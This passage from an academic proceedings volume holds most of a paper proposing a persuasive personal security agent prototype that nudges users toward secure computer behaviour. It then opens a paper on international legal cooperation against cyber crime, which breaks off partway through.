security systems (Adams and Sasse 1999; Chiasson, van Oorschot and Biddle 2006).
In view of the above, this paper proposes an additional approach using a personal (information) security
agent. A personal security agent may be able to address some of the shortcomings of SETA programs by
being context sensitive and providing individual feedback to the user. As a dashboard of a motor vehicle
provides the driver with a range of important information at a glance a personal security agent could
provide the user with a range of security information at a glance as well as relevant and immediate
feedback. Security related information in Windows 7 is provided in the form of the Action Center. Some of
the items monitored by the Action Center include virus protection, spyware protection, user account
control, and windows updates. The Action Center monitors these security items and notifies users when
changes occur. Upon clicking on the Action Center’s flag icon in the notification area a list of issues to be
addressed by the user is displayed. However, unless the user clicks the flag icon he will not be reminded
again of pending issues after a notification has been displayed. Also, due to improved customisability in
Windows 7, a user can turn off these messages. This allows the user to become ignorant of relevant
security issues. The Action Center also lacks an indication of the overall security status. Anti-virus
software provides more specific security information that relates to viruses. Users are notified if threats
are detected or when new virus definition updates are available. However, anti-virus software is only one
component of security on a computer. The personal security agent will have a more holistic approach
including components such as security education as well. Therefore, the task of the personal security
agent will be to provide individual and personal feedback regarding the overall security status and
influence towards secure behaviour as well as reinforcing it. The use of persuasive techniques may help
to achieve this task. Persuasive technologies, or captology, were first proposed during CHI 1997, an
ACM conference on human factors in computing systems (Fogg 1998). According to Fogg (2003),
persuasive technology is defined as “interactive computing systems designed to change people’s
attitudes and behaviours”. Weirich and Sasse (2001) have the opinion that users cannot be forced to
behave in a proper fashion, but an effort to persuade them to do so has to be made.
The rest of the paper, which will attempt to implement the aspects discussed above, is structured as
follows. First, a brief discussion on related work is provided. Secondly, a list of objectives for a personal
security agent is provided. Thirdly, an overview of the proposed criteria, which is divided into functions
and characteristics, is provided. Finally, a prototype is presented and some concluding remarks regarding
future research are given.
2. Related work
Persuasive technology has been applied successfully to domains such as health, safety and marketing.
It was used to persuade people to consume less water at taps (Arroyo, Bonanni and Selker 2005),
encourage physical activity (Consolvo et al. 2009) and healthy living (Del Valle and Opalach 2005), as
well as influencing people to buy more at supermarkets (Cosley et al. 2003). Recent research done by
Yeo, Rahim and Ren (2009) also applied persuasive principles in the field of information security. Their
research tested the effectiveness of a web-based program in order to change the attitudes of end users
towards information security awareness. The program used two persuasive strategies, “tunnelling” and
“influencing through language”, and focussed on e-mail management, password management and virus
protection. It was found that the program was able to positively change the attitudes of participating
students towards information security aware behaviour. However, the program does not provide any
feedback regarding the user’s current security context nor does it perform any user activity monitoring.
Further research done by Forget, Chiasson and Biddle (2007) proposed a persuasive authentication
framework. The framework is based on the following persuasive principles:
246

Ewald Stieger and Rossouw von Solms
The Personalisation Principle: providing customised information offers a more personal experience,
which could be more persuasive than generic information.
The Simplification Principle: tasks should be made as simple as possible.
The Monitoring Principle: when aware that they are being observed, users are more likely to perform
the desired behaviour.
The Conditioning Principle: using various forms of reinforcement to help shape the desired behaviour
or convert existing behaviours into habits.
The Social Interaction Principle: users are more likely to be persuaded by a system that appears to
share similar attitudes, traits, and personality.
The persuasive authentication framework was developed to be an effective tool in educating users to
create more secure passwords and therefore does not consider other security issues. However, Forget,
Chiasson and Biddle (2007) are of the opinion that their framework can also be utilised to educate users
about security certificates, phishing, encryption, malware, and many other security issues.
3. Objectives
By taking the above into account, one can conclude that the main goal of the personal security agent is to
influence users towards a more secure behaviour. In order to achieve this, the personal security agent
should:
Provide the user an indication of his/her security status.
Be context sensitive by monitoring user actions and alerting the user immediately when a performed
action has negatively influenced his/her security status.
Enable, influence and persuade the user to improve his/her security status.
Be easy to use and not frustrate the user.
Not easily be disabled.
Be configurable to some extent because users may have different security needs.
Be able to report certain users that continuously do not follow security practices.
Educate the user regarding relevant security items
4. Criteria of a personal security agent
This section will propose a set of criteria that may enable the personal security agent to achieve the
above objectives. The criteria have been divided into functions and characteristics for a personal security
agent.
4.1 Functions
This section will discuss the most important functions of the proposed personal security agent.
4.1.1 To persuade
Fogg (1998) has synthesised various definitions to define persuasion as “an attempt to shape, reinforce,
or change behaviors, feelings, or thoughts about an issue, object, or action.” Therefore, the personal
security agent will persuade users towards more secure behaviour. Research done by Oinas-Kukkonen
and Harjumaa (2009) has led them to develop a framework for designing and evaluating persuasive
systems. The framework describes various persuasive techniques of which the following are relevant to
the personal security agent and can support its persuasive abilities:
Reduction: Refers to reducing complex behaviour into simple tasks.
Tunnelling: Guiding users through a process or experience.
Self-monitoring: Refers to a system that keeps track of one’s own performance or status and
supports the user in achieving goals.
Praise: By offering praise, a system can make users more open to persuasion.
Rewards: Systems that reward target behaviours may have great persuasive powers.
Surface credibility: A look and feel that conveys credibility
247

Ewald Stieger and Rossouw von Solms
Reminders: Reminding users regarding their security status and behaviour
Liking: A system that is visually attractive for its users is likely to be more persuasive.
Social comparison: System users will have a greater motivation to perform the target behaviour if
they can compare their performance with the performance of others.
In addition to the above, the conditioning and monitoring principle described in section 2 may provide
additional support. According to Forget, Chiasson and Biddle (2007) persuasive technology must be
applied with great care, because there is always a risk of annoying users to the point that they rebel
against the system. Furthermore, Berdichevsky and Neuenschwader (1999) state that there are also
ethical considerations that should be considered, the most important being that the creators of a
persuasive technology should never try to persuade users of something when they would not consent to
be persuaded of it.
4.1.2 To motivate
The personal security agent needs to motivate secure behaviour. Users can be motivated in various
ways. A well known motivation strategy is to provide a reward or incentive. Rewards can be used as
effective means for cultivating interest and increasing motivation and performance (Cameron and Pierce
2002) and can be tangible or intangible. Furthermore, the use of rewards is individual: what may work as
reinforcement for one person may not work for another person. However, motivation can also occur
through fear. Rogers’ protection motivation theory (Rogers 1983) concerns itself with the use of fear
appeals to change the behaviour of people. It states that fear appeals will be effective if they convince the
recipient that:
The problem is serious;
It may affect him/her;
It can be avoided by taking appropriate action; and
The recipient is capable of performing the necessary behaviour required to avoid the problem.
Motivation may also benefit from the competitive nature of people. According to Cheng (2004)
competition and recognition can be used to motivate people's behaviours since most people desire to win
in contests and hope to obtain the glory as a kind of validation from others.
4.1.3 To escalate
The personal security agent needs to be able to escalate bad or inappropriate security behaviour. This
escalation may occur in two ways:
It may reinforce security principles by repeating them through persuasive messages more often.
Bringing the particular user to the attention of an information security officer.
However, before any escalation will take place, the personal security agent will have provided the user
with information regarding his/her behaviour as well as advice on how and why he/she needs to change
behaviour. Only if this information is constantly disregarded by the user, escalation should take place.
4.1.4 To educate
The personal security agent will provide the users with information on ways to improve their security
status. Information will be provided on what influences their security status, why it affects the security
status, and how to improve the security status. Information regarding common threats and how they
manifest themselves should also be given. Users that are more knowledgeable regarding threats and
information security will be less likely to make wrong decisions.
Based on the above functions, the personal security agent will use persuasive principles, motivation and
education to influence user behaviour. For example, a user may be praised for maintaining a good
security status, motivated by comparing his/her security status to that of other users and educated that
his/her password should not only consist of letters. Also, users that exhibit continuous insecure behaviour
may need to be reported so that further action can be taken.
4.2 Characteristics
This section describes the possible characteristics of the personal security agent.
248

4.2.1 Usability and interface design
Ewald Stieger and Rossouw von Solms
Usability may be defined as the ease of use of a specific technology, how effective the technology is in
meeting the user’s needs and the satisfaction of the user with the results obtained by using the
technology to perform specific tasks (Johnson 2006). A research area that explores human computer
interaction (HCI) in computer security is security HCI (HCI-S). Security HCI has been defined by
Johnston, Eloff and Labuschagne (2003) as “the part of a UI which is responsible for establishing the
common ground between a user and the security features of a system. HCI-S is human computer
interaction applied in the area of computer security”. Furthermore, they mention that poor usability design
in security systems or features often creates an aversion amongst users. This results in security being
ignored and not used. Since the personal security agent may be regarded as a security feature, it will
adapt the design criteria proposed by Johnston, Eloff and Labuschagne (2003). These criteria facilitate
developing usable interfaces that are used in a security environment and are based on Nielsen’s (2005)
heuristics traditionally used for heuristic evaluation:
Visibility of system status: The user interface (UI) must inform the user about the internal state of the
system, for example a message could indicate that a security feature is active.
Aesthetic and minimalist design: Only security information relevant to the user should be displayed. The
security UI must be simple and easy to use, maintaining a minimalist design.
Satisfaction: The security activities must be easy to realize and understand.
Convey features: The UI needs to convey the available security features to the user clearly and
appropriately; a good way to do it is by using figures or pictures.
Learning ability: The UI needs to be as non-threatening and easy to learn as possible.
4.2.2 Context sensitivity
According to Zurko (2005), security mechanisms that cannot be understood cannot be effective. Users
need to understand how to use the security controls that are directly relevant to their task and context.
Users can complete a task but are likely to make the wrong decision if they do not know the security
implication that it has. The personal security agent will continuously check for changes that affect the
security status of a user. A detected change and the influence that it has on the user’s security status will
be reported through a rapid feedback cycle:
User performs an security related action
Personal security agent detects change in the user’s security context
An evaluation of the change occurs
User is provided with feedback regarding the action that he/she performed
This can be considered as just-in-time persuasion. Just-in-time persuasion can be very effective, since
the feedback is highly related and available at just the moment people make a decision (Cheng 2004).
4.2.3 Information
Since the personal security agent will continuously check for changes that affect the security status of a
computer user, it will need information to determine whether a particular change is positive or negative.
This decision support information may be based on an information security baseline for computer users in
general or a policy such as an organization’s computer usage policy. Also, users in different roles may
have different security requirements. For example, a home user may not have to secure his/her computer
to the same degree as an investment portfolio manager in the finance department. Therefore, the
personal security agent needs to be configurable to some extent.
4.2.4 Persistency
In order to provide the user with continuous feedback the personal security agent must be “always on”. It
should also not be easily deactivated or switched off by a user since this would defeat its purpose.
249

4.2.5 Evolving
Ewald Stieger and Rossouw von Solms
The “threat landscape” is constantly changing. New threats occur on a daily basis and stealing
information has become big business. For the year 2010 more than 20 million new strains of malware
were identified (PandaLabs, 2010). Furthermore, information thieves are becoming more sophisticated by
the day and have formed groups and alliances to target users. Some of the changes that can be
identified are as follows:
There is a transition from email towards more immediate methods such as instant messaging and
Twitter. Instant messaging and social media connections will replace email as primary distribution
method for malicious code and links (McAfee, 2011).
There is an increasing amount of cyber-protests or “hacktivism”. More people voluntarily allow their
computer to participate in defacement and denial of service attacks to demonstrate their political and
social views (McAfee, 2011; PandaLabs 2010).
Attack toolkits, such as Zeus, are becoming more user-friendly and accessible to novices (McAfee,
2011; Symantec, 2010). In addition to this a mobile version of Zeus has been discovered (Lennon,
2010).
The personal security agent can therefore not remain stagnant and has to adapt and evolve in tandem
with the threats that are out there.
By using principles of security HCI, it may be ensured that the personal security agent is user friendly.
For example, the visibility principle may be realised in the form of a gauge that indicates the security
status using colours such as red, yellow and green. Context sensitivity will allow the personal security
agent to be persuasive the moment the user performs an insecure action. Furthermore, the information
will enable it to make decisions regarding user behaviour. The information may be regarded as a
monitoring configuration and should be adjustable by an authorised person. By being persistent the
personal security agent will be able to monitor the user’s actions and will ensure that it cannot be
deactivated easily. Finally, being able to evolve will allow it to keep up with the changing “threat
landscape” and to be a step ahead.
This section discussed the functions and characteristics of the proposed personal security agent. The
functions defined what the personal security agent should be able to do and the characteristics defined
the attributes of it. The criteria, consisting of functions and characteristics, can be studied through the
development of a prototype. The next section provides a discussion on such a prototype.
5. Developments
Taking all the criteria discussed above into account, a prototype of a personal security agent has been
developed using C# as a programming language and Windows Presentation Foundation (WPF) for the
front end design. Figure 1 below shows a screenshot of the prototype.
Figure 1: A prototype of a personal security agent
250

Ewald Stieger and Rossouw von Solms
The prototype interacts similar to a chat based program by automatically sliding in and out of view from
the bottom right of the taskbar. It is designed to persuade the user more often when his/her overall
security status, as indicated by the dial in the top right, is in the red zone than when it is in the green
zone. Furthermore, if a change in the security status occurs the user will be notified of the change and its
cause. The overall security status is determined from the various status items indicated below status
detail. These items include for example, whether the antivirus program is updated or the firewall is
enabled. For each item the user can obtain additional information regarding why it is important and how
to fix it. The status items may differ based on the user’s context as discussed in section 4.2.3.
Latest security related news is displayed by using a Really Simple Syndication (RSS) feed. This allows
the user to be aware of the latest threats and security issues out there. The news may also motivate the
user to behave more securely. An educational aspect is added in the form of random cyber-threats being
displayed and allowing the user to view information regarding them. Additionally, the construction of
strong passwords may be considered one of the cornerstones of information security. This prompted the
idea to add a password strength tester to the prototype. The tester indicates the strength with a bar that
changes colour from red (very weak) to green (very strong) as the password is typed. The password
strength is determined using an algorithm the considers factors such as length, use of upper and lower
case, use of numbers and symbols amongst others. Finally, the prototype also keeps track of the number
of days the user is secure or insecure as well as the longest secure period.
6. Benefits
For companies and individuals there are many negative consequences such as negative publicity,
competitive disadvantage, identity theft, loss of information and customer confidence, as well as financial
loss that can be associated with insecure user behaviour. Therefore, a personal security agent that
positively influences users towards more secure behavior would be beneficial. Furthermore, a Gartner
analyst report estimated that in less than a decade, organizations will typically deal with 30 times more
information than they do today (Johnson 2006). This suggests an increase in related security breaches
and a need to find solutions for insecure behavior.
7. Conclusions
Influencing users towards secure behaviour is a difficult task and this is often the reason why information
security is not as successful as it could be. Threats follow an increasing trend and a new approach to
combating insecure behaviour needs to be found. This paper therefore has proposed the approach of
using a personal security agent. An “interactive security dashboard” that persuades users to be more
secure. For the personal security agent a set of criteria were proposed consisting of functions and
characteristics that may enable it to achieve its goal. The criteria are not set in stone and need to be
tested. Therefore, to apply the theory in practice a prototype has been developed to test some of the
proposed criteria. Future research will include testing the prototype to obtain feedback regarding
proposed criteria, which may then be revised accordingly. In addition, the results may indicate an
effective strategy that a personal security agent can follow in order to influence a user towards more
secure behaviour. Finally, the outcome of the research will be a framework that can be used to develop
personal security agents. This framework may then be used to develop personal security agents that
influence users towards more secure behaviour and assists them in securing their systems.
References
Adams, A. and Sasse, M. (1999) “Users are not the enemy”, Commun. of the ACM, Vol 42, pp 41-46.
Albrechtsen, E. (2007) “A qualitative study of users' view on information security”, Computers & Security, Vol 26, pp
276 – 289.
Austen, J. and Stewart, G. (2008) “Maximising the Effectiveness of Information Security Awareness”, 2008 Royal
Holloway Series, [online], http://media.techtarget.com/searchSecurityUK/ downloads/
RHUL_Stewart_FINALFINAL.pdf.
Arroyo, E.; Bonanni, L. and Selker, T. (2005) “Waterbot: exploring feedback and persuasive techniques at the sink”,
In: Proceedings of the SIGCHI conference on Human factors in computing systems, 2005, pp 639.
Beautement, A. and Sasse, A. (2009) ”The economics of user effort in information security”, Computer Fraud &
Security, Vol 2009, pp 8 – 12.
Berdichevsky D. and Neuenschwander E. (1999) “Toward an Ethics of Persuasive Technology”, Communications of
the ACM, Vol 42, No 5, pp 51-58.
Cameron, J. and Pierce, W. (2002) Rewards and intrinsic motivation, Bergin & Garvey, Westport, Conn.
Cheng, R. (2004) “Persuasion strategies for computers as persuasive technologies”, [online], Department of
Computer Science, University of Saskatchewan, http://homepage.usask. ca/rac740/file/paper811.pdf.
251

Ewald Stieger and Rossouw von Solms
Chiasson, S., van Oorschot, P.C. and Biddle, R. (2006) “A Usability Study and Critique of Two Password Managers”,
15th USENIX Security Symposium, 2006, USENIX, Berkeley, CA, USA. pp1-16.
Consolvo, S., Klasnja, P., McDonald, D. and Landay, J. (2009) “Goal-setting considerations for persuasive
technologies that encourage physical activity”, In: Proceedings of the 4th International Conference on
Persuasive Technology, 2009, pp 1-8.
Cosley, D., Lam, S., Albert, I., Konstan, J. and Riedl, J. (2003) “Is seeing believing?: how recommender system
interfaces affect users' opinions”, In: Proceedings of the SIGCHI conference on Human factors in computing
systems, 2003, pp 592.
Del Valle, A. and Opalach, A. (2005) “The Persuasive Mirror: computerized persuasion for healthy living”, In:
Proceedings of the 11th International Conference on Human-Computer Interaction.
Fogg, B.J. (1998) “Persuasive computers: perspectives and research directions”, In: Proceedings of the SIGCHI
conference on Human factors in computing systems, 1998, pp 225-232.
Fogg, B.J. (2003) Persuasive Technology: Using Computers to Change What We Think and Do, Morgan Kaufmann,
San Francisco, CA, USA.
Forget, A., Chiasson, S. and Biddle, R. (2007) “Persuasion as education for computer security”, AACE E-Learn,
2007, pp 822-829.
Johnson, E. C. (2006) “Security awareness: switch to a better programme”, Network Security, Vol 2006, pp 15 – 18.
Johnson, M.E. and Goetz, E. (2007) "Embedding information security into the organization", IEEE Security & Privacy,
2007, pp 16-24.
Johnston J., Eloff J. and Labuschagne L. (2003) “Security and human computer interfaces”, IEEE Computers &
Security, 2003, 22(8).
Lennon, M. (2010) "ZeuS Goes Mobile - Targets Online Banking Two Factor Authentication" , Security Week,
[online], http://www.securityweek.com/zeus-goes-mobile-targets-online-banking-two-factor-authentication
McAfee (2011) "2011 Threat Predictions", [online], http://www.mcafee.com/us/resources/ reports/rp-threatpredictions-2011.pdf
Muñoz-Arteaga, J., González, R. M., Martin, M. V., Vanderdonckt, J. and Álvarez-Rodríguez, F. (2009) “A
methodology for designing information security feedback based on User Interface Patterns”, Advances in
Engineering Software, 2009, Vol 40, pp 1231 – 1241.
Nielsen J. (2005) “Ten usability heuristics”, [online], Nielsen & Norman Group, Mountain View,
http://www.useit.com/papers/heuristic/heuristic_list.html.
Oinas-Kukkonen, H. and Harjumaa, M. (2009) “Persuasive Systems Design: Key Issues, Process Model, and
System Features”, Communications of the Association for Information Systems, 2009, Vol 24, pp 28.
PandaLabs (2010) "Annual Report PandaLabs 2010", [online], http://press.pandasecurity.com/wpcontent/uploads/2010/05/PandaLabs-Annual-Report-2010.pdf
Ponemon Institute (2009) “Trends in Insider Compliance with Data Security Policies”, [online],
http://www.ponemon.org/local/upload/fckjail/generalcontent/18/file/Trends%20in%20Insider%20Compliance%2
0with%20Policies%20Final%203.pdf.
Poulsen, K. (2000) “Mitnick to lawmakers: People, phones and weakest links”, [online], http://www.politechbot.com/p-
00969.html.
Rogers, R.W. (1983) ”Cognitive and physiological processes in fear appeals and attitude change: A revised theory of
protection motivation", In: Cacioppo, J., Petty, R. (eds.) Social Psychophysiology, Guilford Press, New York.
Sasse, M., Brostoff, S. and Weirich, D. (2001) “Transforming the "weakest link" - a human/computer interaction
approach to usable and effective security”, BT Technology Journal, Springer, Vol 19, pp122-131.
Sophos (2011) “Sophos Security Threat Report: 2011”, [online],
http://www.sophos.com/sophos/docs/eng/papers/sophos-security-threat-report-2011-wpna.pdf.
Valentine, J.A. (2006) “Enhancing the employee security awareness model”, Computer Fraud & Security, Elsevier,
Vol 2006, pp 17-19.
Symantec (2011) "Symantec Report on Attack Kits and Malicious Websites", [online],
http://www.symantec.com/content/en/us/enterprise/other_resources/bsymantec_report_on_attack_kits_and_malicious_websites_21169171_WP.en-us.pdf
Weirich, D. and Sasse, M. A. (2001) “Pretty good persuasion: a first step towards effective password security for the
real world”, In: Proceedings of the 2001 workshop on New security paradigms. ACM. 2001, pp 143.
West, R. (2008) “The psychology of security”. Commun. of the ACM, Vol 51, pp 34-40.
Whitten, A. and Tygar, J.D. (1999) “Why Johnny Can’t Encrypt: A Usability Evaluation of PGP 5.0”, 8th USENIX
Security Symposium, 1999, USENIX, Berkeley, CA, USA, pp 169-183.
Yeo, A. C., Rahim, M. M. and Ren, Y. Y. (2009) “Use of Persuasive Technology to Change End-Users’ IT Security
Aware Behaviour: A Pilot Study”, International Journal of Behavioral, Cognitive, Educational and Psychological
Sciences, 2009, Vol 1, pp 48-55.
Zurko, M. (2005) “User-centered security: Stepping up to the grand challenge”, Computer Security Applications
Conference, 21st Annual, 2005, 14.
252

International Criminal Cooperation in the Context of Cyber
Incidents
Anna-Maria Talihärm
Cooperative Cyber Defence Centre of Excellence, Tallinn, Estonia
anna-maria.taliharm@ccdcoe.org
Abstract: The borderless and increasingly sophisticated nature of cyber crime calls for effective and timely
responses from numerous stakeholders worldwide – including law enforcement agencies, international organisations,
Computer Emergency Response Teams and Internet Service Providers. Therefore, the role of international criminal
cooperation in the context of cyber incidents is becoming increasingly crucial. Cyberspace has challenged the
fundamental principle of territorial jurisdiction and thus emphasises even more the burden on successful cross-border
cooperation. Above and beyond the technical concerns of poor attacker attribution and the difficulties of acquiring
digital evidence, some of the primary international legal obstacles include the lack of requisite procedural rules,
determining jurisdiction and finding effective means of communication. Moreover, a cyber incident is not always
recognised as a crime by both the victim nation and by the nation from which the attack originated. It is therefore
clear that a thorough review of substantial and procedural law should be undergone on the national level before
international cooperation could be effective, or even possible. This paper focuses on offences against data, property
and infrastructure and draws attention to the most relevant international instruments employed in prosecuting cyber
crime. According to the firm belief of legal experts working in the area, awareness about such international
instruments as well as guidance toward proper implementation are immediately required. Hence, this paper offers a
brief introduction to the main challenges of judicial cooperation in the field of cyber crime and, looking toward the
future, describes important trends in the domain of international criminal cooperation.
Keywords: cyber crime, international criminal cooperation, judicial cooperation, information exchange
1. Introduction
Recent years have witnessed cyber incidents affecting businesses, government institutions, nongovernmental
entities and individuals becoming a daily nuisance. While large-scale cyber incidents such
as Estonia 2007 or Georgia 2008 have raised the question of application of Law of Armed Conflict, and
have in general served as a wake-up call to introduce or strengthen information security regulations (Tikk,
Kaska, Vihul 2009), for the majority of the cases commonly referred to as “cyber attacks”, criminal law is
the most efficient tool to deal with (Kaska, Talihärm, Tikk 2010).
Besides national criminal law, the role of international criminal cooperation in the context of cyber
incidents has proved to be crucial as the borderless nature of cyber crime requires effective and timely
responses from numerous stakeholders worldwide (Blomfield 2007). Despite the sceptics’ view that cyber
cases are often “non-solvable” by nature, efficient international judicial cooperation in criminal matters
has proved to be the facilitator of successful outcome of the criminal procedure.
Building on these assumptions, this article focuses on the international cooperation in investigating and
prosecuting cyber crime. On the one hand, focusing on acts of cyber crime such as offences against
data, property and infrastructure might seem an unnecessary limitation to the analyses of the domain of
international criminal cooperation. However, on the other hand, it is precisely through a comprehensive
overview of the most relevant international instruments employed in prosecuting cyber crimes, that it
becomes possible to identify the unique elements of such cooperation, the prevalent challenges and
appropriate counterparts.
Instead of focusing in great detail on any of the particular challenges related to criminal cooperation in the
context of cyber crime, this article serves as an introductory account on the domain and draws attention
to major international instruments as well as related burning issues. After discussing the main challenges
of cyber crime prosecution, the article identifies important trends in the area of international criminal
cooperation.
2. Conditions for effective international cooperation in cyber context
Broadly defined, efficient legislative response to cyber crime encompasses three fields. Firstly, domestic
substantive criminal law defines the prohibited and punishable cyber activities, i.e. it criminalises certain
conduct in cyberspace. In addition, in case a cyber attack is targeted against the information
infrastructure of another country, domestic Penal Code is supplemented by legal requirements for e.g.
retaining network traffic logs, electronic communications service providers’ duty to cooperation, etc., that
253

Anna-Maria Talihärm
all have impact not only on the results of investigations, but are in a way also the bases for the overall
defence of the nation under attack.
Secondly, domestic criminal procedure law gives the law enforcement and criminal justice system the
necessary tools and means to investigate, prosecute and adjudicate the activities defined by substantive
criminal law as cyber crimes. In general, law enforcement activities can be divided into two main groups:
investigation of the offences and prosecution of the perpetrators (Walden 2006). Appropriate institutional
arrangements for the smooth functioning of law enforcement agencies and their organisational structure
may have critical influence on effective law enforcement strategies (Walden 2006), whereas it is
important to underline that law enforcement structures as such are different around the world and their
functioning is in most cases based on individual policies.
Thirdly, besides the harmonisation of domestic legislation, drafting provisions and establishing institutions
for police and judicial cooperation, a framework for international cooperation includes concluding relevant
multi- or bilateral agreements or joining the existing ones (United Nations 1994). Currently, it can be
observed that national legal standards regarding substantive and procedural rules are to some extent
lacking harmonisation. For example, the Council of Europe’s study on the cooperation between law
enforcement agencies and Internet Service Providers (ISPs) concluded that the relationship is short of
even the “clarity on the very concept of cooperation”. (CoE 2008) Naturally, uncertainties related to legal
aspects and problems with implementation of the existing agreements are not benefiting international
cooperation either.
Furthermore, the domain of international criminal cooperation covers a great number of stakeholders as
well various fields of law. Organisations and states play a significant role in setting the stage and
expressing political will in solving cases that require international cooperation in investigative or
prosecuting phases. Law enforcement agencies, usually public authorities such as investigation bodies,
police and prosecuting authorities have the primary competence in carrying out criminal procedures.
(Walden 2006)
The three above-mentioned elements let us gather that there is an assortment of legal rules – substantive
national law as well as procedural law, and international agreements – that need to be in place before the
discussion about the possibility of international cooperation can grow into a discussion about the
efficiency of cooperation. Therefore, after briefly explaining the work of selected international
organisations in the field of international cooperation, the article moves on to more concrete challenges
an trends in the areas of jurisdiction, timeliness of response, education and awareness, mandate and
duplication of networks.
3. International cooperation: Major international organisations active in the field
Generally speaking, international cooperation in criminal matters is built upon three pillars: multilateral
treaties or conventions, bilateral treaties and relevant regional or organisational regulations. (Ploom
2010) Such legal instruments typically conclude the rules upon which one state will provide legal
assistance to another. The agreements may include provisions concerning the procedure for making
requests, conditions on the use of the assistance as well as procedures for refusing the assistance.
Traditionally, a request for international cooperation in criminal matters does not initiate a national
criminal proceeding in the country receiving the request since all the procedural acts remain within the
regulatory framework of the requesting country. States may also use the option of entering a
“reservations” which allows them to opt out from a specific provision and usually indicates the
characteristics of the national law.
Furthermore, there are a great number of international organisations and their initiatives that shape the
overall picture of international cooperation. As will be shown by the three brief examples below, the
initiatives, their scope, aim and success vary to a great deal and thereby the current state of laws
governing international criminal cooperation is still not wholly harmonized.
Additionally, the question arises whether the versatile legal framework already in place effectively tackles
the challenges posed by the asymmetric nature of cyber crime. As mentioned above, there are a number
of international legal mechanisms aiming at facilitating cooperation between nations in investigating and
prosecuting criminal offences, but so far only a few of them have been put together with specific intention
to regulate the procedural elements of cyber crime.
254

3.1 United Nations
Anna-Maria Talihärm
United Nations Convention against Transnational Organized Crime (UN 2000) is United Nations’s main
international instrument in the fight against transnational organized crime and involves 147 signatory
countries. The countries that have ratified the Convention commit themselves to taking a series of
measures against transnational organized crime, including the creation of domestic criminal offences
such as participation in an organized criminal group, the adoption of legal frameworks for extradition,
mutual legal assistance and law enforcement cooperation, and the promotion of training and technical
assistance for building or upgrading the necessary capacity of domestic authorities. (UN 2004) In spite of
the Convention not directly addressing cyber crime, the framework set forward is equally applicable to
cyber crime offences.
Moreover, there have been discussions about the UN’s role in developing a purpose-built UN cyber crime
treaty that would be open to ratification in all Member States. It is argued that such initiative would not be
unlikely because many of the countries that are advanced in information technology would prefer to
extend the reach of the Council of Europe’s convention to more countries and are struggling with
common international cooperation measures including the essential mutual legal assistance. (Broadhurst
2006)
As a recent development, United Nations convened in 2011 an UN Intergovernmental Expert Group on
the issues related to cyber crime (including criminal cooperation) in order to assess the options to
strengthen existing and to propose new national and international legal or other responses to cyber
threats, i.e. to create a multilateral treaty similar to the Council of Europe’s Convention on Cyber Crime
but involving a larger number of states. By now the states have agreed to undertake an ambitious
comprehensive study on aspects of cyber crime and have scheduled the submission of the study to the
Crime Commission by April 2013. (UNODC 2011)
3.2 Council of Europe
There are several Council of Europe (CoE) conventions that target the issue of cross-border cooperation
in criminal matters. One of the most relevant is the Convention on Cybercrime (CoE 2001a) that despite
being originally designed as a regional mechanism has proved to be an instrument of global significance
(Keyser 2003). As a downside, even though many international organisations are promoting the
Convention, the number of signatory countries is still relatively low. At the time of writing, 47 countries
had signed and 30 ratified the instrument.
As to the overall role of the Convention as a vehicle for international cooperation, the preamble of the
Convention claims that the Convention is necessary “for the adoption of powers sufficient for effectively
combating such criminal offences, by facilitating their detection, investigation and prosecution at both the
domestic and international levels and by providing arrangements for fast and reliable international cooperation”.
Yet, Article 23 of the Convention reminds that the Convention’s primary goal is not to become
a central instrument for international cooperation. According to the Convention, only in those cases where
the existing treaties, laws and arrangements do not already contain such provisions, each Party is
required to establish a legal basis to enable the carrying out of international cooperation as defined by the
Convention.
Besides listing general principles for international cooperation, the Convention states procedural
provisions and tools for efficient investigations (expedited preservation of stored computer data, real-time
collection of computer data, etc.), principles relating to 24/7 networks, extradition, mutual assistance, and
procedures pertaining to mutual assistance requests in the absence of applicable international
agreements.
3.3 European Union and European Police Office (Europol)
The European Union (EU) has traditionally concentrated mainly on establishing a common internal
market, and therefore the majority of the legislative effort has been aiming at the harmonization of the
legal landscape for that purpose. However, it also has competence within the justice and home affairs
area (European Union 2000), even more remarkably with the entry into force of the Lisbon Treaty, and
has in recent years taken notable initiatives in tackling attacks on information systems and critical
infrastructure (European Union 2005). Due to its regional scope, EU is an effective platform for
255

Anna-Maria Talihärm
introducing common standards to all Member States and recent developments have indicated that EU is
moving towards reviewing and refining its framework of cyber crime.
One of the EU initiatives aiming at harmonizing cross-border cooperation is the European Police Office
(Europol) that aims to support the EU Member States in preventing and combating all forms of serious
international crime and terrorism, including high tech and cyber crime. (European Union 2009) Mainly,
Europol is tasked to improve the effectiveness and cooperation of competent Member State authorities
and its overall role is to help to achieve a safer Europe by supporting EU law enforcement authorities
through the exchange and analysis of criminal intelligence. (Europol 2010a)
Regarding its mandate, Europol officers do not entail direct powers of arrest but instead, support the
European law enforcement agencies by gathering, analysing and disseminating information and
coordinating operations. Additionally, it appears common practice for Europol’s experts and analysts to
take part in Joint Investigation Teams solving criminal cases EU-wide.
Importantly, the Council of the European Union decided in 2009 to transform Europol into an official EU
agency. Responding to criticism directed at the lack of transparency and democratic accountability of
Europol (Schaerlaekens 2009), the decision has triggered several changes in Europol’s legal framework,
mainly undertaken in order to simplify and improve Europol’s previous structure.
The expansion of Europol’s mandate and focusing to a greater extent on the fight against cyber crime
should be regarded as a significant development for EU law enforcement authorities. Europol’s objective
to become the principal EU support centre for law enforcement operations (Europol 2010b), and
proposals to establish the European Union Cybercrime Task Force as well as the European Cybercrime
Centre suggest that EU is seeking to improve and render the current approach to the fight of cyber crime
more effective and consistent.
4. Major challenges and trends
International organisations that were discussed above illustrate the various approaches initiated on
regional and international level. However, most of the urgent challenges in the field of international
cooperation have their roots in domestic legislation and the implementation of multilaterally agreed
principles in the national framework. Without going into details with specific procedural problems within
the investigation and prosecution phases, such as search and seizure procedures, expedited
preservation of computer data, disclosure of stored data, interception of content data and collection of
traffic data (Russell et al. 2004), the article lists some of the most common challenges that are connected
with the general aspects of international cooperation within the context of cyber crime. These challenges
give way to several trends in the international criminal cooperation and lead to assumptions on further
developments.
4.1 Jurisdiction
Cyberspace has challenged the fundamental principle of territorial jurisdiction (Brenner 2010) and as the
nature of the Internet disregards national borders, or even encourages diffusing activities over several
countries, criminal investigations are facing complex jurisdictional puzzles.
In prosecuting cases of cyber crime the main problem seems to derive from the nature of modern
computer and telecommunications technology where the structure of networks and methods of data
transmission create an uncertainly about where the criminalised acts have occurred in the first place. A
well-known example of this is the Levin case where Citibank suffered serious breaches of security in its
cash management system and the offender was arrested in the UK and later extradited to the US. (Cryer
et al. 2007)
Moreover, despite both the offender and attacker residing in the same country, part of the evidence may
still be located in a foreign server. Thus, with the option of directing data traffic through networks located
